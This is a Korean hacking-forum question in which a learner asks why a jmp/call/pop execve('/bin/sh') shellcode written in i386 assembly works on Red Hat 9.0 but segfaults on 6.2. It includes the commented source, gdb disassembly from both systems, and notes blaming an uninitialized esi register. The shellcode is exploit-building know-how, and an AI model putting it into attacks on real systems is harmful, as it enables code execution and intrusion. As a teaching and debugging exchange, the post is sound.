http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1546 [º¹»ç]
Redhat 9.0에서 쉘코드 만들기 문서를 참고해서 실습해봤는데 거기서 잘되던 코드를 6.2에서 적용해볼려니까 되지않네요
컴파일은 똑같이 되는데 실행하면 세그먼테이션 폴트가 뜹니다.
이거 커널버전이 달라서 execve함수 구조도 달라서 그런가요? 아니면 컴파일러(gcc) 버전차이 때문인가요?
주석은 한번 달아봤어요..
.globl main
// i386 GNU/Linux, GAS (AT&T syntax), comments use the author's // style.
// Demonstrates the jmp/call/pop pattern: `call func` pushes the address of
// the byte right after the call, which is the "/bin/sh" string placed there
// with .string, so `popl %ebx` recovers that address as a pointer.
// Register roles inside func: eax = syscall number, ebx = arg1,
// ecx = arg2, edx = arg3, esi = base address of the argv array.
// NOTE(review): esi is never assigned anywhere in this listing. func stores
// through it twice, so it writes to whatever address the C runtime happened
// to leave in esi when main was entered. Whether that address is writable
// depends on the libc/gcc build, not on the kernel or the execve ABI --
// this is the likely reason the program runs on Red Hat 9.0 but raises
// SIGSEGV on 6.2. The root cause is an uninitialized register.
main:
jmp come_here
func:
//execve(address of "/bin/sh", start address of the pointer array ["/bin/sh", 0], NULL);
movl $0x0b, %eax
//execve system call number 11
popl %ebx
//execve arg 1: the return address pushed by `call func`, i.e. the address of the .string below
//the argv array is built through esi (uninitialized in this file, see the note at the top)
movl %ebx, (%esi)
//array[0] = address of "/bin/sh"
movl $0x00, 0x4(%esi)
//array[1] = 0 (NULL terminator of argv)
//start address of the array
leal (%esi), %ecx
//execve arg 2: argv
movl $0x00, %edx
//execve arg 3: envp = NULL
int $0x80
//Interrupt! enters the kernel; on success execve does not return here
//exit(0): only reached if execve returned (failed)
movl $0x01, %eax
//exit system call number 1
movl $0x00, %ebx
//exit arg 1: status 0
int $0x80
//Interrupt!
come_here:
call func
//.string appends a NUL itself, so "\00" yields a second NUL byte. The bytes
//after the call are data, which is why gdb shows them as das/bound below.
.string "/bin/sh\00"
6.2 gdb로 분석
(gdb) disas main
Dump of assembler code for function main:
0x8048398 <main>: jmp 0x80483be <come_here>
End of assembler dump.
(gdb) disas come_here
Dump of assembler code for function come_here:
0x80483be <come_here>: call 0x804839a <func>
0x80483c3 <come_here+5>: das
0x80483c4 <come_here+6>: bound %ebp,0x6e(%ecx)
0x80483c7 <come_here+9>: das
0x80483c8 <come_here+10>: jae 0x8048432
0x80483ca <come_here+12>: add %al,(%eax)
0x80483cc <come_here+14>: nop
0x80483cd <come_here+15>: nop
0x80483ce <come_here+16>: nop
0x80483cf <come_here+17>: nop
End of assembler dump.
(gdb) disas func
Dump of assembler code for function func:
0x804839a <func>: mov $0xb,%eax
0x804839f <func+5>: pop %ebx
0x80483a0 <func+6>: mov %ebx,(%esi)
0x80483a2 <func+8>: movl $0x0,0x4(%esi)
0x80483a9 <func+15>: lea (%esi),%ecx
0x80483ab <func+17>: mov $0x0,%edx
0x80483b0 <func+22>: int $0x80
0x80483b2 <func+24>: mov $0x1,%eax
0x80483b7 <func+29>: mov $0x0,%ebx
0x80483bc <func+34>: int $0x80
End of assembler dump.
9.0 gdb로 분석(9.0에선 제대로 동작함)
(gdb) disas main
Dump of assembler code for function main:
0x080482f4 <main+0>: jmp 0x804831a <come_here>
End of assembler dump.
(gdb) disas come_here
Dump of assembler code for function come_here:
0x0804831a <come_here+0>: call 0x80482f6 <func>
0x0804831f <come_here+5>: das
0x08048320 <come_here+6>: bound %ebp,0x6e(%ecx)
0x08048323 <come_here+9>: das
0x08048324 <come_here+10>: jae 0x804838e <__do_global_ctors_aux+2>
0x08048326 <come_here+12>: add %al,(%eax)
End of assembler dump.
(gdb) disas func
Dump of assembler code for function func:
0x080482f6 <func+0>: mov $0xb,%eax
0x080482fb <func+5>: pop %ebx
0x080482fc <func+6>: mov %ebx,(%esi)
0x080482fe <func+8>: movl $0x0,0x4(%esi)
0x08048305 <func+15>: lea (%esi),%ecx
0x08048307 <func+17>: mov $0x0,%edx
0x0804830c <func+22>: int $0x80
0x0804830e <func+24>: mov $0x1,%eax
0x08048313 <func+29>: mov $0x0,%ebx
0x08048318 <func+34>: int $0x80
End of assembler dump.
(come_here의 call문 뒷쪽은 .string "/bin/sh\00" 부분을 어셈으로 나타내다보니 저렇게 된겁니다.)